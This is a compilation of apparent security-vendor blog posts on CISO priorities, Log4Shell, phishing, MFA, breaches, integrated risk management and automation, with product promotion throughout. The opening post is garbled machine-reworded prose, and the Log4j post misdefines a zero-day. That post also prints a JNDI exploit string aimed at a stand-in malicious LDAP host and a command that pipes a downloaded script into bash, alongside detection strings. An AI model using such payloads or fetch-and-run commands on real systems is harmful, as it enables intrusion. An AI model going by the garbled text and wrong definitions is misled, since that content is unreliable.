loader
banner
Cyber security decision-makers are presently looking forward to a vision to support enterprise resiliency. A sizeable number of CISOs indicated a number of enterprises being planned to shoulder in the coming many months, not concentrating on particular tools but the approach and fastening on people, processes and technologies. Also, they say their precedences reflect security requirements due to recent shifts in their organization’s IT and business surroundings, a changing threat landscape, and arising pitfalls. In short, CISOs say their precedences for the coming year are each about keeping pace, and getting better.

Changing Landscape


There’s more going to the cloud and IT is breaking up applications from the data layer. CIOs are moving to further composable architecture while accelerating their digital enterprise.

While the new normal that we have been on this work-from-home passage for two times, so the perimeter is now at the furthest end of where workers want to work, and this state of instability would only continue.


“People are leaving security because they’re burned out. That’s going to be indeed harder to manage in the coming years.”

At the same time, CISOs need to be working on their own staff, too. The conception of this Great Resignation is real, and it’s really unattractive when it comes to security. People are leaving security because they’re burned out. That’s going to be indeed harder to manage in the coming years. The question now for CISOs is How do they manage all that? How do they run smart, so secure and fast are attainable?


Darrell Keeling, vice chairman of information security and HIPAA security officer for Parkview Health, has some ideas. Like other security chiefs, Keeling has seen the trouble geography evolve during his term.


For example, he has seen hackers decreasingly target healthcare institutions with ransomware attacks. At the same time, organizations, including his own, have become more digital with growing cloud environment— moves that have extensively expanded the attack face and virtually excluded the idea of a perimeter.


Keeling says his precedence is to develop security to match both the evolving technology mound and the pitfalls coming at it.


He says that involves simplifying his security mound, moving from a large collection of stylish-of-strain results from multiple merchandisers to one counting heavily on Microsoft security results. (Parkview Health IT is substantially a Microsoft shop using Azure pall.) He says simplifying the security mound will produce further effective and effective security operations, with easier integrations and smaller added costs.


As part of that move, Keeling plans to concentrate on staff training to get further of his platoon Microsoft certified.


Other 2022 precedences for Keeling include enforcing further intelligence, data analytics software, and cloud security technologies; erecting a threat monitoring capability; and shoring up his third-party threat operation program.


Technologies Prioritised



Case in point Cloud data protection technologies are one of the priorities, with a huge number of CISOs either studying, piloting, using or upgrading their use of them.


In another finding, a sizeable number of CISOs are prioritizing cloud-based cybersecurity services. Data access governance technologies also tops the CISO precedences list, as does zero trust, Behaviour monitoring and analysis is another big precedence. CISOs also indicated high interest or use of security unity, orchestration, and response ( SOAR) technologies, with many CISOs either studying, piloting, using, or upgrading their use.


The cloud is really the centerpiece of security,” says Andrew Plato, CEO of the consulting establishment Zenaciti and a cybersecurity critic with The Critic Syndicate. (He notes that he sees CISOs particularly interested in cloud security posture operation platforms that give them a holistic view and enable security across their multiple cloud deployments.)


Kevin F. Brown’s precedences for the forthcoming time are representative of similar trends. Brown, elderly vice-chairman and CISO for Science Applications International Corp. (SAIC), said his top precedences are gift reclamation and retention; business durability and resiliency; zero trust for network, pall, and data; and business enablement.


“Cybersecurity gift continues to be in high demand and short force, particularly in erecting different and inclusive brigades which is essential. Ransomware continues to be a top trouble across assiduity both from a denial of business impact, but also from an adding data exfiltration aspect. Piecemeal from protection capabilities, resiliency and recovery plans need to be in place,” he explains.


He further continues “ Zero trust principles need to be in place not only for traditional network security but also as a strategy for the ever-expanding perimeter of the on-prem and cloud in particular, as well as the protection and integrity of pivotal data. While perhaps a bit all-encompassing, enabling the business is a top precedence, whether it be through furnishing secure business results, mollifying pitfalls, promoting security-by-design generalities, etc.”,


This, reflects the overall state of cybersecurity programs for CISOs, Plato says, noting that 2022 will be about advancement, not revolution. “ Will there be some cool tech that revolutionises everything? Presumably not. But the pieces to do all that (CISOs must) are formerly there,” he adds. ShawnM. Bowen, vice chairman of information security for World Fuel Services, says his overarching ideal is the nonstop enhancement of the security function — a thing that’s driving his work for the forthcoming time.


For example, he’s dogging to edge his capability to design security programs, procedures, and controls acclimatized to his company’s own linked pitfalls.


“I want to evolve beyond a frame maturity model to being a threat- grounded security operation,” he says. “ So rather than erecting security off a frame and furnishing standard services, our thing is to concentrate on our enterprise threat operation program.” To that end, he’s working with his business associates to understand, articulate, and prioritize the pitfalls and pitfalls within their particular functional areas so that security can truly align its coffers to defend against them. 


Security for Enterprise architecture by ZERON : https://zeron.one/portfolio/security-for-enterprise-architecture/


Likewise, Bowen wants to get the business more engaged in the security’s enterprise threat operation approach. He plans to use that engagement to also develop applicable trouble modeling for each of their products and services so he can conform security immolations to those specific pitfalls. He also wants to produce ways to measure progress grounded on how well security improves its performance in delivering services in those areas. 



Further Challenges


CISOs indicate that they face a plenitude of challenges in achieving their objects in the time ahead. According to a number of Studies, CISOs said that the top reason for their association falling short in addressing cyber threat is difficulty persuading all or corridor their association about the inflexibility of the pitfalls they face. Quite a few have indicated that this is an issue. Nearly as many indicated that shy coffers are at play, while many cited the incapability to be adequately visionary in their security strategy. Other top reasons for falling short in addressing cyber threat include struggles in recruiting and retaining professional moxie; failing to always address security conditions during operation development; and shy security training for druggies.


Although admitting those as significant challenges, judges point out that numerous of the CISO precedences will help them push back on these very issues. They note, for case, that fastening on incident response, particularly when acclimatized to business pitfalls and combined with business enablement and resiliency, engender further business support for security enterprise. Meanwhile, adding further data protection technologies, cloud security tools, and results supporting zero trust and SOAR help bed security into further of the core technology mound, rather than making it a bolt-on service. And CISOs who add orchestration capabilities as part of those technology deployments help ease the challenges that come from having too many security staffers and the occasional stoner-side security slip-ups.


Our Team at ZERON has been working on reducing the hassle nature of security monitoring prevalent in the industry. With better visualization and orchestration where necessary, a lot of undue hassle can be reduced reducing the undue dependency on human labor and utilizing minds where necessary. Also, there is a need for better handling of security KPIs and proper mapping across sectors correlating with the various aspects of security with respect to the people, process, and technology. Finally, it is true that security is 90% deliberation, 10% perspiration, and this is where proper visualization, analysis, and reports that we at ZERON have our focus on, so that once the deliberation is nailed the perspiration part will be easier to take care of.

Log4j is a term that has created a massive buzz in the IT Industry for the last few days with its 0-day released this month. But what does it mean and how ZERON can help in its management and mitigation?

What is Log4j?

 
“ The flaw in the Log4j software could allow hackers unauthorised access to computer systems, Millions of devices are affected. ”
A 0-day is a vulnerability/flaw in a software package that has been recently been discovered by the vendor themselves. It’s something, that has been there for some time but its existence has been known for “zero days”. The flaw found in the software was discovered and published(and patched) on 10th of December 2021, which means that any system with this vulnerability/flaw will be susceptible to hackers until they are patched. The reason for the buzz, is that Log4j is used by millions of devices and all of them are susceptible to hackers. All the versions of Log4j are vulnerable to this flaw, which means that this vulnerability was there for a “lot” of time. This also means that there can be hacker groups using this flaw in secret for years and we wouldn’t even know about it. The vulnerability was patched but whether the patched was applied or not to all the vulnerable systems, is an entirely different story. This vulnerability/flaw of Log4j is named as “CVE-2021-44228”.

CVE-2021-44228

 
This vulnerability initial appeared on Twitter on Friday with accounts of zero-day exploitation of a vulnerability in a popular Java logging framework, Log4j. The core of the problem is that when specially crafted text are used, Log4j will interpret them instead of just logging them. This can lead to an RCE (Remote Code Execution), compromising any system using this software. The vulnerability has been named “Log4Shell” and received the highest possible severity rating of “10”. Log4j is often used as part of other software, which resulted in an explosion on the scope of vulnerable devices, making the patch distribution way harder. After the initial public release on Twitter, detection and exploitation tools were introduced within hours.

Analysis

 
The vulnerability Log4Shell has a very high attacker value, and a very high exploitability score. Which implies that the exploit is easy to weaponise inferring that it is highly likely that hackers will exploit this flaw. It is also reported as a vulnerability that is exploited in the wild. The vulnerability is common in enterprise systems and the softwares are vulnerable in their default configuration making it way worse. The vulnerability has been categorised as CWE-502 (Deserialisation of Untrusted Data), CWE-400 (Uncontrolled Resource Consumption), CWE-20 (Improper Input Validation). The basic exploit can look something as simple as ${jndi:ldap://malicious-ldap-server.com/a}

Detection

 
To check if the vulnerable version Log4j is installed in the system, one can run a one-liner code in terminal:
wget https://raw.githubusercontent.com/rubo77/log4j_checker_beta/main/log4j_checker_beta.sh -q -O - |bash
Their are a few ways to detect if this vulnerability is being exploited in your system:
  • Review apache logs for `jndi:ldap`, `jndi:rmi` or `jndi:dns`. These are the magic strings that cause the logger to go haywire and follow/execute the url that follows it.
  • Scan /var/log with yara signatures matching some of these indicator
  • Scan the webserver for generic webshell
  • If you have EDR on the web server, monitor for suspicious curl, wget, or related commands.
  • If you have ZERON installed, it would help you to get the vulnerability detected without the above hustle which ZERON does for you automatically.

Mitigation

 
There is an easy way to mitigate the vulnerability by updating the software to version 2.15.0. In case that is not possible, one can try setting the system property “log4j2.formatMsgNoLookups” to “true” or remove the JndiLookup class from the classpath to mitigate the issue. If the server has Java runtimes version 8u121 or later, then one can protect against the RCE (Remote Code Execution) by setting com.sun.jndi.rmi.object.trustURLCodebase = false and com.sun.jndi.cosnaming.object.trustURLCodebase = false A quick scan with ZERON will provide you with a more detailed review and mitigation tactics for your system to implement in a user friendly form.

The world of deception has taken its turn towards worse with the population moving to a cyber realm in the era of work from home, remote processes and socially intimidating aspects being a major part of the life of millions if not billions. The generation of statistical data, stealing credentials, or making targeted advertisements for your profile, maybe also injecting your system with something malicious in the worst cases. Phishing has been a hot topic of the current times but overlooked as a hyped awareness by many. Is it too hasty to come to a conclusion like that? Well, the 65% population falling prey to the same tells a lot.

Phishing scams usually make use of the tactic of making yourself known by the image of a trusted entity via email to lure you into clicking malicious links and content that may redirect you into an exact replica of your favorite and blindly trusted website. “Well hey! I know this”, exactly what the victim thinks before entering his/her credentials and boom, gone in seconds. Phishing might also be in different mediums like SMS Phishing (Smishing), Voice Phishing (Vishing) and some other terms which might come into existence in near future, but with the same motive to put hands on your details.

phishing, hacking, social engineering, scam, fraud

What happens if I do?

Clicking on such a such might have a range of effects on your system depending on the intent of the adversary looking forward to making a malicious impact into a victim’s life by means of harvesting credentials for the intent to impersonate online presence on a social media platform, email or any website with a user identification. The victim might also be compromised by means of a malware injected within the mobile or personal computer system either proving out to be a ransomware to encrypt all data for recovery only after a paid ransom, creation of a backdoor for access or escalating his way into networks that you might be connected to.

In all the ways there is one common intent for the adversary and that is the compromise of data in one form or another to be made into use for benefit or sold for monetary income. 

Clicked on it! What Next

The general hygiene to maintain a safe front in case you come across and accidentally click on one such link would be to Disconnect your device from the internet immediately. Plugging y=out any cables in case of an ethernet internet connection or disconnecting the machine or mobile from the home WiFi network. 

Following this step the best practise is to quickly take a backup of all the files on your system that are not continuously backed up by cloud based backup services in case the malicious content that might have been transported to your system starts running to alter the same. Usually a blank hard drive is the best option to take storage backups without any other previous files in case those stand a risk of being tampered as well.

A system scan with the basic antivirus or defender softwares can be initialized to check for any malware in the system can also be a precautionary approach to make sure of any potentially installed services followed by a change in your account credentials that are susceptible to be compromised and mean the world to you. Generally social media or email accounts are targeted the most.

Once you’re done, make sure to raise a fraud alert and file a crime report to flag the website or link or sender with a fraudulent tag to keep others safe.

Checking for the links on the URL bar, verifying resources, making sure that the King of Nigeria isn’t really wanting to send you a Million Dollars as part of his royal lottery for which you have to submit your details on a given link. A little awareness goes a long way.

What if you come back to your computer in other insufficient hands while you were aware when your phone suddenly tingles with the notification chime saying there is an attempt to login to your precious social media profile or even important cloud admin panels? Well, that was a saviour, wasn’t it? All thanks to Two Factor Authentication also known as Multi Factor Authentication or if these are a mouthful, simply MFA.

Two Factor authentication brings an extra edge of login security for major applications ranging from Facebook, Twitter and Instagram, to GMail, AWS Dashboard, Superset and many more. Wait, it is not always about the SMS Authentication MFA or 2FA can be a deliverable temporary authentication to any device in your closest possession, a second email, a code generator linked with the application, via calls and other methods such as physical hardware as well.

Multi Factor Authentication, 2FA, MFA

Is it Important?

 

Maintaining authentication apps, receiving and typing in codes manually filling in captcha requests by stressing your eyes on small letters can be a nuisance to thought but surely an amazing frontline to defend against the horrors of modern world breaches.

Taking into consideration the massive scale breaches recorded not in history but in the recent past with millions and billions of user credentials out in the wild being swapped from one hand to another as we speak. The attacked and compromised accounts thereby being logged into to make better escalations into personal profiles are curbed by our heroes for the day.

By guessing the short predictable password or running scripts against fields to guess passwords, a large-scale data breach is most susceptible to using one such method to lure your account into their control. Or maybe try to lure you into their traps with Phishing websites, Spear Phishing or checking for redundant passwords that you might have used for multiple platforms, sounds ridiculous? Who would do that in their right minds? Well, more than 44% of the population is the answer.

Well, too good that the small ting on your mobile phone for an attempt to login made you change your password and log out of all other devices in time.

Is this magic?

Different MFA methods can use different approaches to checking for such authenticating methods but general rules include the presence of an authentication server responsible for sending and the verification of such codes provided the username and passwords match from the user databases. 

In the fast paced world a dynamic approach to maintain security on the aspects of web and application security built to maintain a snug fit to the requirement for the loose relying on just passwords is the way forwards. Sometimes, a little hold back on time is a good thing.

Ravaging through the times when it was tough to explain the need for cybersecurity for an organization brings forward a number of chapters that proved everyone wrong. Holding a back seat in the list of prioritized elements sure makes some compromises that escalate faster than something Elon Musk randomly tweets about.

Cybercrime is predicted to inflict nearly 6 trillion USD globally in the present year with the rates predicted to grow by a rate of 15% per year for the upcoming days ending up in an annual loss of 10.5 trillion USD by the end of 2025 from the recorded 3 trillion USD in 2015. Ransomware, Spywares, Trojans, Social Engineering attacks, all of them coming fast, faster than you expect.

Blog Image Graph

Let’s go by some recorded numbers, shall we? Where the estimated loss of revenue in India alone was recorded to be 1.25 Lakh Crore in the year 2019. With ransomware attacks increasing every day with the increase in the exponential graph with current Work From Home Scenarios.

With about 52% of domestic companies based in India falling victim to a cyber attack of minor or major origin studies show a standstill in cybersecurity budgets and underestimated levels of damage threats although incidents are on the rise. With 71% of victims reporting a serious breach and 65% facing a downtime of nearly a week, reputation, brand value, market trust come down with each missed configuration.

Blog Image Identity

Let us look at the recent incidents that make sense out of the loose scenario of security under a priority list. The security flaw leading to a leak of millions of PII data for Indian Citizens along with Covid 19 test results from a website run by the Government of West Bengal follow the path of the preceding data leak of similar origins by a large Indian Diagnostic firm Dr. Lal Pathlabs. Unprotected servers and development flaws continue to make headlines as long as secure systems take a back seat.

You don’t want any of your friends to know about your examination results right? But what if someone displays it to the entire world? Wait, it’s not only you but nearly 190,000 other aspirants just like you! Where the results of the 2020 Common Admission Test along with personal data were made available on the cybercrime forum, including names, DOB, email IDs, Mobile Numbers, Previous results, and much more.

Let’s take a step back and assume you performed well and need to celebrate with a slice of cheesy Pizza! Wait, a data breach in a puny little pizza order as well? The incident came to light with the massive data breach incurred by Dominoes leaking PII, PCI and other details for the world to view on the Dark Web like the Dark Web wasn’t scary enough in the first place.

Come forth security, let’s flatten the curve of rising threats by taking a step back and thinking about securing ourselves first. So, when do you start thinking? Zeron offers you an all-around solution to help secure an organization from endpoint vulnerabilities with the utmost scrutiny, customizable and scalable to the size of any organization. 

EA Breach news image

In a huge Cyber Security Event, after a failed attempt at extortion, some hackers have leaked online a massive amount of 751 GB cache data that they previously stole from Electronics Arts. These files included the source code of the popular FIFA 21 game. The hackers had expected a large sum of money from EA Sports given the massive popularity of the game, but they refused to budge resulted in the leak earlier.

The criminals tried to sell the FIFA 21 source code on the internet as well but it also went in main as there were no takers. In the end, they dumped the whole thing on torrent sites. Now any individual can end up setting up private servers to play the game with their friends however it strongly inadvisable. Other than the piracy aspect of the activity the hackers may also try to spread malicious viruses, ransomwares or other such thing embedded with the code which might have the opportunity to spread to large sections. Although EA officials have said that the hackers could not access player data, it remains to be seen how much of that is the truth.

In an interview couple of months back, one of the cybercriminals revealed that they had purchased stolen authentication cookies for an EA internal Slack channel for $10. It was sold in a dark web marketplace called Genesis. The cookies were later used to replicate the account of an EA worker, allowing them access to the company’s Slack channel. The hackers then played a bit of social engineering by tricking an IT support staff to grant them access to the internal code repositories of the company.

Such security breaches are a major wake up call for organisations to improve their security posture with the ever changing threat landscape. There is no alternative to “Zero Trust” in this current day and age. Security needs to smarter, more scalable and more importantly with “Zero Trust Architecture”.

Integrated risk management (IRM) is a set of practices and processes supported by a risk aware culture and enabling technologies, that improves decision making and performance through an integrated view of how well an organization manages its unique set of risks. 

Under the Gartner definition, IRM has certain attributes: 

    • Strategy: Enablement and implementation of a framework, including performance  improvement through effective governance and risk ownership 
    • Assessment: Identification, evaluation and prioritization of risks 
    • Response: Identification and implementation of mechanisms to mitigate risk Communication and reporting: Provision of the best or most appropriate means to  track and inform stakeholders of an enterprise’s risk response 
    • Monitoring: Identification and implementation of processes that methodically track  governance objectives, risk ownership/accountability, compliance with policies and  decisions that are set through the governance process, risks to those objectives, and  the effectiveness of risk mitigation and controls 
    • Technology: Design and implementation of an IRM solution (IRMS) architecture 

Integrated risk management is the combined activities of corporate governance, digital and cyber risk management, and cybersecurity-based compliance integrated into a holistic approach that enables a streamlined program, enhanced enterprise-wide visibility into the cyber posture, and meaningful automation to augment teams’ abilities and insights. 

The needs of businesses today are changing. Where before the siloed approach of  Governance Risk and Compliance teams operating almost independently was sufficient, this rapid increase in technology adoption has shifted the needs of information security teams and the businesses they serve. 

Many forces caused the next iteration of security, privacy, and risk management to emerge:  the integration of technology into business-side teams made digital risks ubiquitous across the organization, not just within technical teams. With breaches such as Equifax, Marriott,  and Capital One, CEOs and Boards have seen how information security can have direct impacts on the bottom line. As the scope of IT risk assessment has expanded to include the entire business, information security leaders can no longer operate in modular and siloed teams.

Management

Traditional Approach to Risk Management 

Risk control has targeted on operational or management dangers in a number of features,  particularly in finance, fitness and safety, fire, security, communications, and insurance.  Those features have a tendency to function frequently and independently inside silos in an uncoordinated and unsystematic manner. But there was popularity with the aid of using senior managers that kept running in practical silos frequently and faced consequences in inefficient overlaps (and probably extreme gaps) with the average chance to manipulate strategy. It is additionally supposed no person ought to offer the board a holistic evaluation of prioritized chance profile of the organization. 

The Downfall of Traditional Risk Management 

Faced with the pandemic’s fast-moving, interconnected risks, organizations everywhere were left scrambling to deal with operational and financial difficulties they never contemplated, let alone planned or practiced for. If you don’t have all the facts, the action becomes nothing more than a shot in the dark. 

The crisis may have sounded the alarm, but the glaring weaknesses revealed in the way risk and compliance are traditionally managed will not magically disappear when the coronavirus eventually runs its course. Even outside of crisis, today’s risk landscape is more crowded and uncertain than ever – and virtually every risk is gaining in velocity and ferocity.  It’s difficult, if not impossible, to assess your true exposure with the fragmented view provided by old-school risk management techniques. 

How can integrated risk management help my business?

As existing risks become more complex and new risks continue to emerge, companies need strong integrated risk management programs. Not having a clear understanding of risks and their potential effects can impede an organization’s decision-making, and harm its business performance. Organizations taking an integrated approach to managing risk will also achieve consistent risk management outcomes. 

Many companies are adopting an integrated approach to risk management, enabling executives to coordinate and unify risk management activities throughout the enterprise.  Integrated risk management gives organizations a better understanding of their risks and helps support informed risk-based decision-making. 

The Rise of Integrated Risk management 

Our always-connected world demands a similarly connected approach to risk management.  To survive in a world dominated by social media, mobile devices, and relentless scrutiny by everyone inside and outside the organization, senior leaders need to rely on an increasing number of stakeholders to identify, manage, and reduce risk together. 

Stakeholders across the organization need to be able to freely exchange data and ideas to proactively address accelerated and amplified risks. And all that intelligence needs to be available in real-time to top decision-makers, who must continually make hard strategic choices to drive organizational success, that takes an integrated approach to risk management. 

Integrated risk management brings into focus anything that could harm your organization,  its competitive position, reputation, or strategic growth. It connects the dots between every risk – insurable and non-insurable, strategic and operational – so you can understand what you’re facing, how everything interrelates, and the cumulative impact on the organization. 

Comparison

IRM v/s GRC v/s ERM 

According to Reciprocity consultant Gerard Scheitlin, founder, and president of risk management company RISQ Management, there is no difference between IRM, ERM, and GRC. All three terms refer to enterprise-wide, integrated risk management, a program that encompasses cybersecurity, finance, human resource, audit, privacy, compliance, and natural disasters. 

ERM is centered around the strategic planning, organizing, leading, and controlling of a  company’s risk activities. That is, an organization examines its strategic business objectives,  then reviews the information technology risks associated with them, to assure business continuity. 

IRM, meanwhile, focuses specifically on analyzing the risks inherent in an organization’s technologies. Integrated risk management incorporates many elements of enterprise risk management, but it’s typically more focused on IT functionality. According to business research and advisory company Gartner, IRM involves the hands-on work that makes ERM  possible: the technical controls critical to effective cybersecurity such as security monitoring, network monitoring, and perimeter protection. 

Both IRM and ERM provide a holistic model of risk management, including IT risk and operational risk, and are integrally related. You can’t have one without the other: IRM feeds  ERM, and ERM guides IRM.

The idea of Governance Risk and Compliance (GRC) is not new to the information security industry. For years, GRC approaches and solutions have enabled organizations to operate cybersecurity teams for all three of those functions (corporate governance, IT risk, and industry and geographic compliance). The triggers that have caused the shift away from a  siloed approach have also caused information security leaders to seek out integrated risk management as a means to align their entire information security organization to deliver on these new expectations. 

Towards More Integration 

The techniques of risk identification, evaluation, analysis, and control are equally applicable to all risk management functions whether operational or financial as the methodology behind them is the same. 

Though some specialist knowledge will be required, an integrated approach essentially requires good planning, teamwork, and communication; sharing ideas and technical knowledge. The diversity inherent in an arrangement where professionals from different backgrounds and disciplines interact and challenge assumptions can often lead to striking insights and alternative approaches. Indeed it is often individuals with the least experience in an area that can ask the most insightful questions, having as they do no long-held assumptions about what can and can not be asked. 

How to implement Integrated Risk Management? There are four pillars to implementing an integrated risk management program:  

Aligning your cyber strategy with business outcomes: The new role of CISO is acting as a bridge between technical cybersecurity teams and business-side stakeholders and executive management. The critical step is to ensure that you align your cyber strategy and tactics with the business outcomes that executive management is seeking to achieve. Start by asking yourself what identified risks you’re investing the most time and effort in mitigating. What are the disruptions caused by those risks if left unprotected? Is your company enabling technologies that improve performance through an integrated view of risk? 

Sharing your knowledge helps the entire organization recognize that security is now an organization-wide effort that everyone must be aware of and participate in. This shift also allows non-technical business leaders to make more informed strategic decisions for their respective business units within the context of digital risk and the unique set of risks they may face. 

Facilitating a risk-aware, risk-engaged culture: Any goal of shifting an organizational culture can appear daunting, but with the right amount of patience and correct approach, it is possible. As a CISO, it is critical to ensure that you have buy-in from allies and colleagues within the C-suite to support your effort of shifting culture. CyberSaint partner’s experience, these positions as first alliances prove true. In one of these case studies, they worked with a Fortune 100 entertainment company, and their point of contact was the Director of IT. The IT Director knew that they needed to increase risk awareness across the organization and began soliciting buy-in from the CIO and the COO. The reason for this choice was that with the CIO’s technical understanding and the COO’s process of identifying ownership of employee development, these two would be the IT Director’s best evangelists as the program grew. The results were stunning. Once the IT Director, CIO, and COO had established the needs and goals they began expanding in concentric circles – going from three to  15 to 100 and so on until they did alter the company culture. 

A culture change of any kind is daunting – it is a journey that requires patience,  diligence, and constant vigilance to ensure that the new ideas remain and scale with the organization. For CISO’s working to increase cyber risk awareness at their organization, stating that you are going to change the culture is like saying you’re going to change the direction of a river – it is possible, but you have to start small.  Start with critical stakeholders that will facilitate the change with you and be prepared to evangelize. 

Integrating risk into business strategy discussions: CISOs implementing an IRM  program must see the give and take between business growth and security. Any strategic decision or new business growth shifts the risk landscape and could impact business. In today’s business world, the assumption is that new business growth is in some way related to technology and as such increases the digital risk profile of the organization.  

Effective risk management activities result in secure growth for the business.  Although, too many CISOs see any residual risk as a failure to do their job. However,  a risk-aware culture enables the organization to effectively convey the decisions of which risks to address, and why a set of practices exists. This transparency is imperative to ensure that the whole organization knows where it stands on risk management activities. 

Effectively reporting on a risk-based approach: If it’s not measured, it’s not managed. Shifting from a checklist compliance-based approach to integrated risk management will change the way your security organization reports on its success.  An integral value of an integrated approach to risk and compliance is the powerful insights that leaders can glean from all of that information being in one place. Where cybersecurity organizations would previously have to spend weeks or months generating reports from scores of spreadsheets and risk registers, using an integrated approach and an IRM program not only delivers better stories and insights but automates much of the reporting process. 

Accepting Responsibilities 

Whatever the job description risk management in all its forms is always everyone’s responsibility not just that of specialists who have the term in their job title. The simple reason for this is that for every major incident there will be thousands of smaller incidents that collectively will present significant avoidable costs to organizations and which offer clear warning indicators of issues that need to be addressed before a major incident occurs.  Major incidents are commonly accepted to be the tip of the iceberg, and if organizations which to reduce the frequency and severity of accidents they need to address the underlying causes of such incidents by learning from previous, preferably lesser, events. 

To really address the issue of incident prevention the first steps are to identify, evaluate and control threats. To be effective this needs to be a team effort involving the entire organization with everyone taking responsibility for initiating and implementing opportunities for organizational learning. The first step in this is to increase risk awareness and alter the organization’s risk cognition. This is best done through regular communication activities and most importantly extensive training so that each employee understands their risk management roles and responsibilities as well as how they are to implement key risk controls. 

The key to addressing how employees support risk control measures is to build an awareness of how a threat to the business is also a threat to each employee’s job security, threatening as it does the very existence of the organization. For example, tolerating colleagues smoking in authorized places could cause a fire that would effectively destroy the business. A lack of vigilance within the company premises can encourage petty theft and perhaps lead to more serious crimes or a steady fall in company morale. However to be responsive to such risks employees need to be aware of them, understand how to control them and how to implement such measures. This requires training and good internal communications.  Unfortunately in the industries that I have had experience with, many employees still perceive such risk management activities as ‘somebody else’s job’. 

Comparison

The Benefits of IRM 

A well integrated risk management solution can bring a number of benefits, including

More agile, risk-based decision making, based on having one view of top risks  Bridging the strategy/execution gap, assuring that project delivery is tied to the  business’s organizational needs and vision 

Identifying risks at the strategic level, which could have a major effect on the entire  company 

Empowering companies to manage these risks 

Understanding that risks across the business create opportunities for cost savings,  competitive advantages, and alignment 

Enabling organizations to take the initiative with those opportunities, rather than  just reacting to them 

Minimizing cybersecurity threats and maximizing opportunities, boosting the  chances of achieving strategic and operational objectives 

Providing management with useful information to aid the decision-making process Helping companies create risk-aware cultures, so employees understand that risk  exists in all levels of the enterprise and that they can (and should) manage that risk  smartly, reaping the most benefits 

Improving operational efficiency by reducing the costs and cycle times of risk assessments. An integrated risk management framework is the formal, structured approach to governing risk. Applying an integrated risk management framework allows organizations to evaluate their risks by connecting the objectives, the organization’s functional departments, and the components of a risk assessment. The industry standards that help to establish strong cybersecurity control often refer to IRM  frameworks. 

The challenges in realizing IRM Technology  benefits 

Given the challenges presented by the current business environment, perhaps it’s not surprising that many organizations are struggling to realize true IRM and the benefits that it brings. Tellingly, 72 percent of financial services risk managers surveyed by Accenture say that complex, interconnected new risks are emerging at a more rapid pace than ever before. There are complexities and obstacles that span people and culture, processes, technology,  and data. 

People: The small percentage of organizations reporting success in building a data-centric and data-literate culture have a fluid workforce equipped with the right skills. The lack of an enterprise strategy and C-level sponsorship for IRM can amplify these problems. 

Process: Companies have standardized processes across many risk functions, but many have not yet addressed implementing the technology to support these processes. Non-standardized risk processes with one-off customizations can result in difficult implementations of capabilities such as machine learning. 

Technology: Outmoded legacy tools from the GRC era have made it difficult to implement IRM across an entire risk organization. An additional complication is that risk organizations have historically operated in silos, with different technology solutions supporting individual risk functions. The resulting ecosystem looks more like a maze than a coherent blueprint. 

Data: Poor data quality results in only a third of firms trusting their data enough to use it effectively and derive value from it. Companies also find it hard to control and manage data at scale, inhibiting their ability to operationalize and use it for strategic purposes.

Concluding 

Shifting from a modular approach to managing cybersecurity and compliance, to integrating security, privacy, and risk is a daunting proposition. An integrated risk management approach requires security leaders to commit to the journey, not just for their teams and organization but the entire business as a whole. It will be challenging and the change won’t always be easy, but with the right allies, tools, and approach you and your organization can make the shift to integrated risk management. 

Bringing the power to your hands with a complete management and visualization support to make use of capabilities in the organization Zeron provides complete solution to manage your events and risks with complete ticketing system and advance defensive mechanisms.

 

Swimming in a pool of jargon reading through numerous documentations of varying lengths just to find more words to look upon a search engine to understand the process of automation in cybersecurity? Well, automation is computations at the end of the day and computations can go wrong, doesn’t it? The perspective of a person seeking a solution to curb the chances of one company being on the shame list or another looking for a solution to make tedious matters facile, automation is turning smarter.

Adding the edge of a smarter system with adaptive machine learning systems making a breakthrough in the recent era brings out newer terms in the dictionary such as Intelligent Automation (IA). The strategic combination of a Defensive Artificial Intelligence implementation collaborated with Robotic Process Automation strategies to bring an adaptive, effective, and buzz-worthy edge to the industry.

Looking at the spectrum we are talking about in terms of cybersecurity, IA systems can stand a chance to prove themselves where the security of assets relies on effective solutions safeguarding the pieces of information.

What are the Parts of IA we are Looking at?

    1. Artificial Intelligence and Machine Learning – Yes, I am aware of the hype that one comes across scrolling down nearly every technological article and even social media in recent days. With signature-based systems detecting more than 90% of attacks and patterns successfully backed by the strategic combination of both AI and ML to reduce the splurge of false positives in traditional measures of single implementations. Bringing together Distanced Resources in an organization, increasing efficiency of threat hunting capabilities adding up to the reactive services aiding the proactive solutions to gain power with updated measures than traditional vulnerability matching databases.
    2. Robotic Process Automation – Making sense of the structured inputs and logics fed making the skeleton to the nervous system of AI and ML, RPA is easier to implement on top of existing architectures and applications. Now if that isn’t a reason to stick to implementing IAs without the “Huge Time Building” sentences.

Proactive and Persistent Approach

Whether being away from the working environment during active hours for the rest of the world trying to pry into your systems or finding solutions going beyond happening probabilities for the stickiest of DDoS preventions. Whether Windows Defender with real-time app scanning methods or Large Scale business asset and fallout checks on a multiscale architecture. 

The main reasons for one to opt for the path of an IA and automotive measures can be boiled down into –

    • Efficient management in real-time, cost-effective as compared to manual skills traditionally required round the clock
    • Mitigating the probabilities of errors and false positives with a balance of the detecting and sense-making capabilities with AI and ML in harmony
    • Prioritization of decisions with defensive method approaches helping make sure of susceptible endpoints

Not looking back at the points of saving time and making an efficient raised ticket system to stave off overlooking eyes in a matter of minutes if not seconds. With a global gap of cybersecurity workforce ranging up more than 4 million one can be sure of the hassles to muster in new employees with efficient skills but maintain efficiency with lesser aided by IAs.

Do we see a future?

A mixed emotion answer contradicting everything above might be a disappointing conclusion to end this article on. Yes and No as per the convenience might be able to be explained with the approach of the advancements of IA and Automation measures. As attacks turn sophisticated in turns of the minute hand, intelligence lies in manual processes for the adaptive algorithms to further sharpen their skills. 

Used in numerous applications currently IAs mark the stamp of identity in sectors of utmost importance, as systems get smarter and intelligence sharper, the age of AI and IA comes sooner than one can expect.

A step ahead with Zeron

Bringing automation to reality with integrated security monitoring services to counter more than 1700 vulnerabilities keeping you a step ahead of overlooking sights. Bringing the nature of processing and securing to easier implementation and all-around protection 24/7.